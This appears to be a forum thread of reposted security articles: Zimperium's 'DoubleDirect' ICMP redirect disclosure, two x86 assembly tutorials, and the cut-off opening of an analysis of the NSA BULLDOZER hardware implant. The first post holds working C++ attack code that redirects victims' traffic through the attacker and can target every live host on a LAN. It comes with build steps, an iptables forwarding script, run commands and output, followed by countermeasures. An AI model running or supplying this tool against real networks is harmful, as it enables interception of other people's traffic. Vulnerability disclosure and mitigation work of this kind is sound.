} // Function to send a couple of ICMP redirect messages void* icmpRedirectAttack(void* arg) { // Get attack parameters const IcmpRedirParameters* parameters = reinterpret_cast<const IcmpRedirParameters*>(arg); // Create packet Crafter::Packet* redir_packet = createIcmpPacket(parameters); // Send 3 packets for(int i = 0 ; i < 3 ; ++i) { redir_packet->Send(); sleep(3); } return 0; } void startIcmpRedirectAttack(IcmpRedirParameters& parameters) { pthread_t tid; pthread_create(&tid, 0, icmpRedirectAttack, reinterpret_cast<void*>(¶meters)); pthread_detach(tid); } void startIcmpRedirectAttack(IcmpRedirParameters& parameters, const std::string& destination) { IcmpRedirParameters* new_parameters = new IcmpRedirParameters(parameters); new_parameters->_destination = destination; // Save it in global list of poisoned entries pthread_mutex_lock(&entries_mutex); poisoned_entries.insert(std::make_pair(new_parameters->_victim + ":" + new_parameters->_destination, new_parameters)); pthread_mutex_unlock(&entries_mutex); // Start attack startIcmpRedirectAttack(*new_parameters); } void DnsWatcher(Crafter::Packet* sniff_packet, void* user) { IcmpRedirParameters* parameters = reinterpret_cast<IcmpRedirParameters*>(user); /* Get the Ethernet Layer */ Crafter::Ethernet* ether_layer = GetEthernet(*sniff_packet); /* Get the IP layer */ Crafter::IP* ip_layer = GetIP(*sniff_packet); /* Get the UDP layer */ Crafter::UDP* udp_layer = GetUDP(*sniff_packet); /* Checks if the source MAC is not mine */ if(ether_layer->GetSourceMAC() != getGatewayMac(parameters->_interface)) { // Checks if the packet is coming from the server if(ip_layer->GetSourceIP() == parameters->_victim) { // Get the RawLayer Crafter::RawLayer* raw_layer = GetRawLayer(*sniff_packet); // Create a DNS header Crafter::DNS dns_req; // And decode it from a raw layer dns_req.FromRaw(*raw_layer); // Check if the DNS packet is a query and there is a question on it. if( (dns_req.GetQRFlag() == 0) && (dns_req.Queries.size() > 0) ) { // Get the host name to be resolved std::string hostname = dns_req.Queries[0].GetName(); // Print information std::cout << "[@] Query detected -> Host Name = " << hostname << std::endl; } // ...or coming from the server (better) } else if (ip_layer->GetDestinationIP() == parameters->_victim) { // Get the RawLayer Crafter::RawLayer* raw_layer = GetRawLayer(*sniff_packet); // Create a DNS header Crafter::DNS dns_res; // And decode it from a raw layer dns_res.FromRaw(*raw_layer); // Check if we have responses on the DNS packet. if(dns_res.Answers.size() > 0) { for(size_t i = 0 ; i < dns_res.Answers.size() ; ++i) { if(dns_res.Answers[i].GetType() == Crafter::DNS::TypeA) { // Get the host name to be resolved std::string ip = dns_res.Answers[i].GetRData(); // Print information std::cout << "[@] Response detected -> IP address = " << ip << std::endl; // Poison this address startIcmpRedirectAttack(*parameters, ip); } } } } } } // Function to poison a fixed list of DNS servers void* poisonDnsServers(void* user) { IcmpRedirParameters* redirect_parameters = reinterpret_cast<IcmpRedirParameters*>(user); while(not finish) { // HardCode DNS servers we want to redirect to our machine startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222"); // OpenDNS startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220"); // OpenDNS sleep(10); } return 0; } int main(int argc, char* argv[]) { // Print header std::cout << "[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****" << std::endl; // Program name std::string progname(argv[0]); // Check arguments if(argc < 2) { printUsage(progname); return 1; } signal(SIGINT, ctrl_c); signal(SIGTERM, ctrl_c); // Parameters std::string interface, victim_ip, new_gateway, source_ip; // Victim's IPs std::vector<std::string> victims; int c; // Define options static struct option long_options[] = { {"interface", 1, 0, 'i'}, {"new-gateway", 1, 0, 'g'}, {"victim", 1, 0, 'v'}, {"source", 1, 0, 's'}, {NULL, 0, 0, 0} }; int option_index = 0; while ((c = getopt_long(argc, argv, "i:v:g:s:",long_options, &option_index)) != -1) { switch (c) { case 'i': interface = std::string(optarg); break; case 'v': victim_ip = std::string(optarg); break; case 'g': new_gateway = std::string(optarg); break; case 's': source_ip = std::string(optarg); break; case '?': printUsage(progname); return 1; break; default: printUsage(progname); return 1; } } if(interface.size() == 0) { std::cout << "[#] Error: Missing interface " << std::endl; printUsage(progname); return 1; } if(victim_ip.size() == 0) { std::cout << "[#] Missing victim IP address. Poisoning the entire network" << std::endl; // Total hosts std::vector<std::string> total_hosts; // Get local information of the interface ifcfg_t local_info; get_local_info(interface, &local_info); // Get first IP address in_addr_t first_ip = local_info.nmask.s_addr & local_info.bcast.s_addr; in_addr_t delta_net = ~ntohl(local_info.nmask.s_addr); // Create list of ignored IPs addresses std::set<std::string> ignored_ips; ignored_ips.insert(getGatewayIp(interface)); ignored_ips.insert(Crafter::GetMyIP(interface)); ignored_ips.insert(get_string_ip(first_ip)); // Loop over IPs addresses on the network for(size_t i = 0 ; i < delta_net ; ++i) { // Get destination IP address in_addr_t nip = ntohl(ntohl(first_ip) + i); std::string ip = get_string_ip(nip); // Only attack IPs which are not on the ignore list if(ignored_ips.find(ip) == ignored_ips.end()) { total_hosts.push_back(ip); } } // Get hosts UP std::map<std::string,std::string> host_up = arp_ping_discover(total_hosts, interface); // Set as targets only alive hosts for(std::map<std::string,std::string>::const_iterator it = host_up.begin() ; it != host_up.end() ; ++it) { victims.push_back((*it).first); } } else { // Push only one victim victims.push_back(victim_ip); // Print attack's parameters std::cout << "[#] Attack parameters : " << std::endl; std::cout << " [+] Interface : " << interface << std::endl; std::cout << " [+] Victim IP address : " << victim_ip << std::endl; } // Try to get the IP of the gateway std::string gw_ip = getGatewayIp(interface); // By default the source IP address of the message is the current gateway if(source_ip.length() == 0) source_ip = gw_ip; if(gw_ip.size() == 0) { std::cout << "[#] Error: Interface " << interface << " don't have an associated gateway" << std::endl; return 1; } // Get MAC address of the gateway std::string gw_mac = getGatewayMac(interface); std::cout << "[#] Gateway parameters : " << std::endl; std::cout << " [+] Gateway IP address : " << gw_ip << std::endl; std::cout << " [+] Gateway MAC address : " << gw_mac << std::endl; std::string my_ip = Crafter::GetMyIP(interface); // By default set attacker's IP as the new gateway if(new_gateway.length() == 0) new_gateway = my_ip; std::cout << "[#] My parameters : " << std::endl; std::cout << " [+] My IP address : " << my_ip << std::endl; for(size_t i = 0 ; i < victims.size() ; ++i) { // Get victim IP std::string victim = victims[i]; // Setup attacks parameters IcmpRedirParameters* redirect_parameters = new IcmpRedirParameters; // Interface redirect_parameters->_interface = interface; // Victim IP address redirect_parameters->_victim = victim; // Net gateway redirect_parameters->_new_gateway = new_gateway; // Source of the ICMP redirect message redirect_parameters->_source_ip = source_ip; pthread_mutex_init(&entries_mutex, 0); pthread_t dns_poison_id; pthread_create(&dns_poison_id, 0, poisonDnsServers, reinterpret_cast<void*>(redirect_parameters)); pthread_detach(dns_poison_id); // Create a sniffer Crafter::Sniffer* sniff = new Crafter::Sniffer("udp and host " + victim + " and port 53", interface, DnsWatcher); // Now start the main sniffer loop void* sniffer_arg = static_cast<void*>(redirect_parameters); sniff->Spawn(-1, sniffer_arg); // Save sniffer reference sniffers.push_back(sniff); } // Wait while(not finish) sleep(1); std::cout << "[#] Finishing ICMP redirect attack..." << std::endl; std::cout << "[#] Fixing route table on victim's machine. Number of poisoned entries = " << poisoned_entries.size() << std::endl; // Threads std::vector<Crafter::Packet*> fix_packets; // Protect entries pthread_mutex_lock(&entries_mutex); // Loop over all entries for(std::map<std::string, IcmpRedirParameters*>::const_iterator it = poisoned_entries.begin() ; it != poisoned_entries.end() ; ++it) { // Get parameters IcmpRedirParameters* parameters = it->second; std::cout << " [+] Fixing table for destination : " << it->first << std::endl; parameters->_source_ip = parameters->_new_gateway; parameters->_new_gateway = getGatewayIp(parameters->_interface); // Push packet fix_packets.push_back(createIcmpPacket(parameters)); } // Send all the packets, 3 times for(int i = 0 ; i < 3 ; ++i) { Crafter::Send(fix_packets.begin(), fix_packets.end(), interface, 16); sleep(3); } pthread_mutex_unlock(&entries_mutex); pthread_mutex_destroy(&entries_mutex); std::cout << "[#] Finishing fixing route table on victim's machine" << std::endl; return 0; } To compile and run the code in this post you will need libcrafter (https://code.google.com/p/libcrafter/) installed in your system. Libcrafter in an open source multi-platform library written in C++ and released under the new BSD license. Libcrafter provides a high level interface to craft, decode and sniff network packets which makes it easy to create networking utilities without dealing with low level details. To compile it in your GNU/linux or MAC OS X system, execute the following commands: $ git clone https://github.com/pellegre/libcrafter $ cd libcrafter/libcrafter $ ./autogen.sh $ make $ sudo make install $ sudo ldconfig Note that you need libpcap installed in your system before configuring libcrafter (apt-get install libpcap-dev) DoubleDirect: Full-Duplex ICMP Redirect Attack – Scenario Gateway = 192.168.1.1 Attacker (Ubuntu) = 192.168.1.105 Victim (Galaxy S4) = 192.168.1.101 – Victim’s machine First we need to check if the device accepts redirects. In my case (galaxy S4) accept redirects bit was enabled by default: # cat /proc/sys/net/ipv4/conf/all/accept_redirects 1 In case that ICMP Redirect is not enabled and you want to test this attack, you should execute: # echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects – Attacker’s machine Finally, on the attacker’s machine we need to tell the kernel a few things so the attack works correctly. The following commands should be executed on the attacker’s machine (as root): To forward IP packets # echo 1 > /proc/sys/net/ipv4/ip_forward Don’t send redirects. This is very important, we need to tell the attacker’s kernel not to send redirects : # echo 0 > /proc/sys/net/ipv4/conf/all/send_redirect – Attacking the device Compile doubledirect_poc.cpp: $ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter $ ./doubledirect_poc [#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool ***** [#] Usage: ./doubledirect_poc [options] [#] Options: -i, --interface Interface -v, --victim Victim IP address -d, --destination Destination address to poison Instead of poisoning a LAN ARP entry we poison a remote IP address when accessed by the victim. In doing so we trick the victim to send IP packets intended to a particular destination through our device instead of the real gateway. When the device sends an IP packet with a destination 8.8.8.8 it should use the gateway (192.168.1.1). Now let’s poison that entry. On the attacker machine execute: $ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8 [#] Attack parameters : [+] Interface : wlan0 [+] Victim IP address : 192.168.1.101 [+] Destination to poison : 8.8.8.8 [#] Gateway parameters : [+] Gateway IP address : 192.168.1.1 [+] Gateway MAC address : *:*:AE:51 [#] My parameters : [+] My IP address : 192.168.1.105 We can see how the entry for 8.8.8.8 is poisoned with our IP address (192.168.1.105). When a packet with a destination to 8.8.8.8 is sent from the victim, it will use our computer as a gateway for that packet. This will allow us to sniff all the traffic from that destination (a classic man in the middle attack). Once we have all the DNS traffic forwarded transparently through our computer, we can send an ICMP Redirect packet to every IP address we found on the sniffed DNS replies. We are not only sniffing all the DNS traffic of the victim, but everything that is resolved through it. To test if you are vulnerable to DoubleDirect first execute the following lines of bash code to set up iptables and IP forwarding properly: # cat iptables_dobule_direct.sh #!/bin/sh if [ $# -lt 1 ]; then echo "[@] Usage: `basename ${0}` " echo "[@] Example: `basename ${0}` wlan0" exit 0 fi INTERFACE=${1} echo 1 > /proc/sys/net/ipv4/ip_forward echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects iptables --flush iptables --zero iptables --delete-chain iptables -F -t nat iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE # ./iptables_double_direct.sh wlan0 Finally, execute the Zimperium DoubleDirect Audit tool: # ./doubledirect_poc -i wlan0 -v 192.168.1.101 [#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool ***** [#] Attack parameters : [+] Interface : wlan0 [+] Victim IP address : 192.168.1.101 [#] Gateway parameters : [+] Gateway IP address : 192.168.2.1 [+] Gateway MAC address : 00:1f:*:* [#] My parameters : [+] My IP address : 192.168.2.103 The DNS servers are hard coded inside the code (line 397, doubledirect_poc.cpp file). You can add any host for the initial ICMP redirect packets there: // Hardcoded DNS servers we want to redirect to our machine startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222"); // OpenDNS startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220"); // OpenDNS Countermeasures iOS, Android and Mac OS X usually accepts ICMP redirect packets by default. To test if your OS X is vulnerable to DoubleDirect run the following command : sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE" To disable ICMP Redirect on Mac (as root): # sysctl -w net.inet.ip.redirect=0 On the mobile side, most Android devices (galaxy series) with the accept_redirect field enabled by default To disable you need to root your device and execute: # echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects Who is at risk? – iOS: The attack works on latest versions of iOS including iOS 8.1.1 – Android: On most Android devices that we have tested – including Nexus 5 + Lollipop – Mac: Mac OS X Yosemite is vulnerable. Most of GNU/Linux and Windows desktop operating system do not accept ICMP redirect packets. Source
-
To program in Assembly, you will need some software, namely an assembler and a code editor as we have seen in chapter 1. An assembler takes the written assembly code and converts it into machine code, it will come with a linker that links the assembled files and produces a executable from it (.exe extension). Sometimes, a crash may happen when the program cannot normally continue its execution or even run because of a programming bug; fortunately, there is a program called the debugger that runs other programs, allowing its user to exercise some degree of control over the program, and to examine them when things go amiss. Another tool you may have guessed is the disassembler, which translates executable code into assembly language—the inverse operation to that of an assembler. Finally, there is a tool called a resource compiler, I’m going to explain it later in this saga. In each tool, there is quite a good selection that can do the job very well. Code Editor: (Notepad++, UltraEdit, VIM, …) Assemblers: (JWasm, GoAsm, yASM, Fasm, …) Linker: (JWlink, Link, PoLink, …) Resource Compiler: (Microsoft RC, PoRC, GoRC, …) Debugger: (OllyDBG,Immunity Debugger, WinDBG, SoftICE, …) Disassembler: (IDA Pro, Win32Dasm, HDasm, …) Integrated Development Environment (IDE): ( All-In-One utility, Source Code Editor + Assembler + Linker + Resource Compiler) Assembler / Linker : It goes without saying that MASM, originally by Microsoft, is the king of the hill. The real problem with MASM is the restrictions about its license, and also that it’s not constantly updated but only on an as-needed basis by Microsoft. JWasm fixes it all: JWasm is free, has no artificial license restrictions, and can be used to create binaries for any OS. JWasm’s source is open. Hence JWasm is able to run – natively – on Windows, DOS, Linux, FreeBSD and OS/2. More output formats supported (Bin, ELF). Optionally very small object modules can be created. Better support for Open Watcom, for example the register-based calling convention. JWasm is faster than MASM. We will use PoLink as a linker, we can use ML (Microsoft Linker) too, there is only one difference between them: PoLink accept RES files for resources, whereas ML wants an OBJ file. Another difference is that PoLink can make smaller EXE’s although, with the right switches, and it is more up to date. Debugger/Disassembler: Now, we will look at some of the differences between several of the most widely used Debuggers/Disassembles. This is by no means exhaustive. Consider it as a brief overview to give people new to assembly/reversing a “quick start” guide. Before we look at IDA Pro (Free), Immunity Debugger (ImmDBG) and Olly Debugger (OllyDBG). We must first fully understand the differences between a debugger and a disassembler. I have heard these terms used interchangeably, but they are two separate tools. A disassembler will take a binary and break it down into human readable assembly. With a disassembler you can take a binary and see exactly how it functions (static analysis). Whereas with a debugger we can step through, break and edit the assembly while it is executing (dynamic analysis). IDA Pro (proprietary software, free version available) Honestly, IDA Pro should be in a category by itself. It is an interactive, extensible disassembler and debugger. IDA is also programmable with a complete development environment. This allows users to build plug-ins and scripts to assist them in their research. The standard version of IDA is too expensive and gives you support for over 50 families of processors. But for someone who is new to reversing/disassembling, the free version will do just fine. One of the main advantages you’ll notice that IDA has over Immunity Debugger (ImmDBG) and Olly Debugger (OllyDBG) is its platform support. IDA is available for Windows and Linux as well as Mac OS X. Olly Debugger (OllyDBG) OllyDBG is a user-friendly, very small and portable 32-bit user-mode debugger with intuitive interface. As you get experience, you’ll able to discover how powerful OllyDBG is. OllyDBG knows most of the Windows APIs when you’re examining your binary. OllyDBG will show you what each register parameter means. Unfortunately, it does not understand Microsoft’s symbol file format or debug information. Immunity Debugger (ImmDBG) Immunity Debugger is very similar to OllyDBG, the only new features ImmDbg offers over Olly is Python scripting and function graphing, both of which are already supported in Olly through plug-ins. There are also plug-ins to fix the numerous bugs Olly has as well. This is what it’s all about. Integrated Development Environment: There are also a thousand IDEs, all of them are quite awesome: Once you have the JWasm Assembler, the MASM32 SDK, and the EasyCode IDE, extract them in a default folder in your hard disk. You don’t actually need the other tools for this part, keep them for later. Unzip the package and run install.exe. Then, a series of message boxes will pop up, keep hitting OK till it asks to start extracting the package. Again, click OK till it says that the installation has proceeded to its completion and appears to have run correctly. Unzip the EasyCode.zip file and the ‘EasyCode.Ms‘ folder will be created. Place the whole EasyCode.Ms folder anywhere you like in one of your hard disks. If the folder already exists, overwrite it. Close all applications, open the EasyCode.Ms folder and run the ‘Settings.exe’ program (if possible, as an Administrator). Choose the desired options and press the ‘OK’ button. Now extract the JWasm archive, locate ‘JWasm.exe’, and copy it in the ‘C:masm32bin’ directory. Run the ‘EasyCode.exe’ file (located in the ‘EasyCode.MsBin’ folder) or in the desktop and set the paths for Masm32 files. To do so, use the ‘Tools–>Settings’ menu. Go to the Compiler/Link Tab and set up paths as below: Apply the changes, then press OK. Now that we have our tools working like a charm, let’s begin programming! This is the most commonly written program in the world, the “Hello World!” program. Click CTRL+N for a new project, choose classic executable file, and uncheck all the options: Copy and paste the following code in your IDE: ;----------------------------------------------- ; MessageBox.asm — Displays “Don’t learn …” in a message box ; ---------------------------------------------- .386 .Data MsgBoxCaption DB “Simple Message Box”,0 MsgBoxText DB “Hello, 0ld W0rld !”,0 .Code start: push MB_OK +MB_ICONASTERISK push offset MsgBoxCaption push offset MsgBoxText push NULL call MessageBox invoke ExitProcess, NULL End start Click F7 for building the project, you’ll be asked to save it. First of all, I recommend you create a new folder called ‘Projects” in EasyCode.Ms and save all your projects in it. Afterward, create a new folder in the “Projects” directory and call it: myFirstProgram, save all files: myFirstProgram.ecp (The Project File). myFirstProgram.asm (The Assembly code file). Press CTRL+F5 to run it: Congratulations, you have just run your first assembly code ! Take your time to discover your favorite IDE and its features. Also, you should take into consideration that IDA Pro alone requires a book or a whole chapter to fully present it as it is worth, and this also goes for OllyDBG & ImmDBG. In this chapter, the primary goal was to get you familiar with some assembly and debugging/disassembling tools. I assume you understand that the syntax of assembly code differs slightly from an assembler to another; nevertheless, different assemblers will generate in the end the same machine code.
-
- 1
-
As usual, last Friday night I was hanging out with friends, picking up girls in the street and chasing after them. One night, I had a strange feeling just like something was gonna happen. But I was not sure if it’s gonna be good or bad. My closest friend, Esp!oNLerAvaGe!, came out with me. I dressed up and we were ready. We took a taxi to Aîn Diab, a very active place in Casablanca, Morocco. While walking, I saw a very gorgeous girl, everybody was looking at her, and I decided to give myself a chance and have a talk with her. On my way to her, I heard someone who said loudly: “JAVA IS AWESOME”. When I heard that, I lost my attention span, and I kept my thoughts fixed on “JAVA” & “AWESOME”. Not because I have something with Java, but because at that moment, I really wasn’t expecting someone to say such a thing. I kept walking towards the girl and she was gazing at me. I said: Me: Hi, could I have a word with you? Her: Hi! .. ohhh yeah ! Me: I’ve seen you leaving the cafe, you look so adorable and I want to ask you something… Her: Ooh .. Wh..a…t kind of question is th.a…t ? In the meantime, there was a bunch of guys trying to figure out something. I was kinda out of it, looking at the girl but listening to the guys. Then, I heard : “YOU WRITE ONCE AND RUN EVERYWHERE.” I said to myself, shouldn’t it be “write once, debug everywhere“? Afterward, he said: “JAVA IS THE FUTURE,” AND HE ASKS HIS FRIENDS TO FORGET ABOUT ASSEMBLY. I decided to intervene. I said: Sorry, do you know what is Assembly? The guy replied: mm… not much actually, do you? I said oh yes. Him: can I ask you some questions then? Then I smiled, asked the girl to join us, and the conversation started. What is Assembly Language ? Assembly language programming is referred to as low-level programming because each assembly language instruction performs a much lower-level task compared to an instruction in a high-level language. As a consequence, to perform the same task, assembly language code tends to be much larger than the equivalent high-level language code. So Assembly Language is Machine Language ? Somehow. Machine language is a close relative of the assembly language. Typically, there is a one-to-one correspondence between the assembly language and machine language instructions. In fact, they differ only in appearance. The processor understands only the machine language, whose instructions consist of bits of 1?s and 0?s. So, you need a program that can do this magic for you! This program is called : the Assembler. “Writing code only with 1 & 0 is cumbersome, that’s why we don’t write anymore with machine code,” he murmured… What is an Assembler ? An assembler is a utility program that converts source code programs from assembly language into machine language, so the CPU can understand it. A picture is worth a thousand words: Is Assembly Language Portable? Absolutely Not! Assembly language is directly influenced by the instruction set and architecture of the processor. The instructions are native to the processor used in the system. In other words, porting an assembly language program from one computer to another with a different processor usually means starting over from scratch. For example, a program written in the Intel assembly language cannot be executed on the Motorola or an ARM processor. Which Assembler is the Best ? There are well over a dozen different assemblers available for the x86 processor running on PCs. They have widely varying feature sets and syntax. Some are suitable for beginners, some are suitable only for advanced programmers. Some are very well documented, others have little or no documentation. Some are supported by lots of programming examples, some have very little in the way of example code. Certain assemblers have tutorials and books available that use their particular syntax, others have nothing. Some are very basic, others are very complex. Which assembler is best, then? Like many of life’s questions, there is no simple answer to the question “which assembler is best?” This is because different people have different criteria for judging what is “best”. Without a universal metric for judging between various assemblers, there is no way to pick a single assembler and call it the best. In this saga, we will use an assembler called JWasm. In the next chapter, I’ll tell you why we choose this assembler. Here is a small map I’ve designed to give you a global image of different assemblers. How Does Java Relate to Assembly Language? High-level languages such as C++ and Java have a one-to-many relationship with assembly language. A single statement in C++ expands into multiple assembly language or machine instructions. We can show how C/C++ statements expand into machine code. Most people cannot read raw machine code, so we will use its closest relative, assembly language. The following C++ code carries out two arithmetic operations and assigns the result to a variable. Assume myVariableA and myVariableB are integers: int myVariableA; <span style="font-family: Courier New; font-size: 10pt;">int myVariableB = (myVariableA + 4) * 3; Following is the equivalent translation to assembly language. The translation requires multiple statements because assembly language works at a detailed level: mov eax,myVariableA ; move Y to the eax register</pre> <span style="font-family: Courier New; font-size: 10pt;">add eax,4 ; add 4 to the eax register </span> <span style="font-family: Courier New; font-size: 10pt;">mov ebx,3 ; move 3 to the ebx register </span> <span style="font-family: Courier New; font-size: 10pt;">imul ebx ; multiply eax by ebx </span> <span style="font-family: Courier New; font-size: 10pt;">mov myVariableB,eax ; move eax to X A statement in high-level language is translated typically into several assembly language instructions, and a lot of 1 and 0 bits in binary form. Well, ultimately there has to be something to execute the machine language instructions. This is the system hardware, which consists of digital logic circuits and the associated support. Pff !! .., This is all crap! I don’t get anything in this code and I am still not convinced … In JAVA, there is a reduced risk of bugs, no absence of library routines, programs are easier to maintain. And you don’t get BORED writing long routines. Why Should I Care? It’s fast– Assembly programs are generally faster than programs created in higher level languages. Often, programmers write speed-essential functions in Assembly. It’s powerful – You are given unlimited power over your assembly programs. Sometimes, higher level languages have restrictions that make implementing certain things difficult. It’s small– Assembly programs are often much smaller than programs written in other languages. This can be very useful if space is an issue. It’s magic - To investigate an application whose source code is not available (and most frequently, this is the case), it is necessary to discover and analyze its algorithm, which is spread over the jungle of assembly code. Or, to understand how a client/server application communicates, it is necessary to analyze packets and reverse engineer the undocumented protocol. Sometimes, when a specific vulnerability is exposed, a company may discover more related bugs, so they fix them silently with no public announcements, and a person may reverse engineer the patches or fixes and detect what changes have been made to a particular file and possibly create exploit code to exploit it. Also, investigation of undocumented features of the operating system or a file format is also carried out using Assembly. Other tasks that can be done using this language include searching for backdoors, neutralizing viruses, customizing applications for the hacker’s own goals, cracking secret algorithms — the list is endless. The area of application of Assembly language is so wide that it is much easier to list the areas to which it has no relation. Assembly language is the only computer language that lets you talk to a computer in its native tongue, commanding the hardware to perform exactly as you say. If you like to be in charge, if you like to control things, if you’re interested in details, you’ll be right at home with assembly language. Believe me, Assembly is the true language for programmers ! A hacker that hasn’t mastered Assembly language is not a hacker because nothing really moves without it. Who Needs to Learn It? Software Vulnerability Analysts, Bug Hunters, Shell-coders, Exploit Writers, Reverse Code Engineers, Virus Authors, Malware Analysts .. And many more! Sometimes, some math applications or 3D games need optimization, so they call Assembly. For instance, consider the situation, in which an infamous General Protection Fault window pops up, containing an error message informing the user about a critical error. Application Programmers or Software Engineers, cursing and swearing, obediently close the application and are at a loss (they only guess that this is the program’s karma). All of these messages and dumps are unintelligible to them. The situation is different for the ones that have mastered Assembly. These guys go by the specified address, correct the bug, and often recover unsaved data. What Types of Programs Will I Create? I’d also like to mention that all examples included in this saga were tested under operating systems of the Windows NT family from Windows 2000 upwards. Therefore, although I did my best, I cannot guarantee that all examples will work under Windows 9x systems or Windows ME. You can write desktop, networking, or database management apps; You can write gaming and DirectX apps; You can write crackmes, trainers, or security tools.. … In Assembly, you are limited only by your imagination. Tiny Web Browser from the WinAsm Forum. EzProcess : Process/Thread Manager Program from the WinAsm Forum. Oldies but Goodies, PacMan in pure ASM : For our beloved crackers, a key generator from FOFF Team : Why x86 Family Processors? Why Windows? Assembly language programs can be written for any operating system and CPU model. Most people at this point are using Windows on x86 CPUs, so we will start off with programs that run in this environment. Once a basic grasp of the assembly language is obtained, it should be easy to write programs for different environments. What Background Should I Have? You should have programmed in at least one structured high-level language, such as Java, C, C++, Pascal, Python, or Visual Basic. Generally speaking, you should know what is a variable, an array, a string, what are functions & how to use an IF/WHILE statement to solve programming problems. It’s not a must, but it is advisable. Listen gentleman: Now you know that any programming task that can be done in a high level language can also be done in Assembly language since all high level languages have to compile source code down to Assembly language code level for CPU execution. I hope that you understand also that Assembly is more needed when size or time speed matter. Finally I’m sure that you get the idea that Assembly is CPU-dependent, we are focusing the x86-32bits family here, under the Windows platform. With that piece of information in hand, we shall go off to next chapter, setting up an environment development with the right tools. What about meeting tomorrow folks? Same time same place. Bring your laptops. The girl: Humm!! Impressive. Tell me, what is that question you wanted to ask me? Me: Aha!! Let me ask you first what is your name? Her: They call me Megabyte. You? Me: They call me Noteworthy. Were you interested in the conversation? Her : Oh yes : ) Me: So what about joining us tomorrow? Her: That would be my pleasure. See you tomorrow. source: x86 Assembly Language, Part 1 - InfoSec Institute
-
This article is the second part of a series on NSA BIOS Backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as malware dropper and wireless communication “hub” for NSA covert operations. Despite that BULLDOZER is a hardware, I still use the word “malware” when referring to it because it’s a malicious hardware. Perhaps the term “malware” should refer to both malicious software and malicious hardware, instead of referring only to the former. I’d like to point out why the BULLDOZER is classified as “god mode” malware. Contrary to DEITYBOUNCE, BULLDOZER is not a name in the realms of “gods”. However, BULLDOZER provides capabilities similar to “god mode” cheat in video games—which make the player using it close to being invincible—to its payload, GINSU. Therefore, it’s still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti malware tool during its possible deployment timeframe. As for GINSU, we will look into GINSU in detail in the next installment of this series. The NSA ANT Server document—leaked by Edward Snowden—describes BULLDOZER briefly. This article presents an analysis on BULLDOZER based on technical implications of the information provided by the NSA document. Despite lacking in many technical details, we could still draw a technically-sound analysis on BULLDOZER based on BIOS and hardware technology on the day BULLDOZER became operational, just like in the DEITYBOUNCE case. Introduction to GINSU-BULLDOZER Malware Combo BULLDOZER doesn’t work in isolation. It has to be paired with the GINSU malware to be able to work. As you will see in the next installment of this article, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let’s just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs. This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let’s look at the context where BULLDOZER and GINSU work. GINSU and BULLDOZER are a software and hardware combo that must be present at the same time to work. We need to look at the context where GINSU and BULLDOZER operate in order to understand their inner working. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network. Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data Figure 1 shows BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks or machines located in a network that is hard—but not impossible—to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier compared to using an “ordinary” computer network intrusion approach. Let’s look closer at the technical information revealed by the NSA ANT product data document, before we proceed to deeper technical analysis. The NSA ANT server product data document mentions: GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant—codenamed KONGUR—on systems with the PCI bus hardware implant, BULLDOZER. The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation. BULLDOZER is installed in the target system as a PCI hardware implant through “interdiction”—fancy words for installing additional hardware in the target system while being shipped to its destination. After fielding, if KONGUR is removed from the system as a result of operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant. It’s clear that there are three different components in the GINSU-BULLDOZER combo from the four points of information above and from Figure 1. They are as follows: The first component is GINSU. The GINSU code name is actually rather funny because it refers to a knife that was very popular in 1980s and 1990s via direct sell marketing. Perhaps the creator of the GINSU malware refers to the Ginsu knife’s above average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM—PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article. GINSU might share some modules with DEITYBOUNCE because both are a malicious PCI expansion ROM—see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute. However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card, codenamed BULLDOZER. Therefore, GINSU could be much larger in size compared to DEITYBOUNCE because NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate a lot more functions compared to DEITYBOUNCE. Second is the type of PCI add-in card type that GINSU might use. From Figure 1, GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or other kinds of PCI add-in cards for wireless communication. This implies the 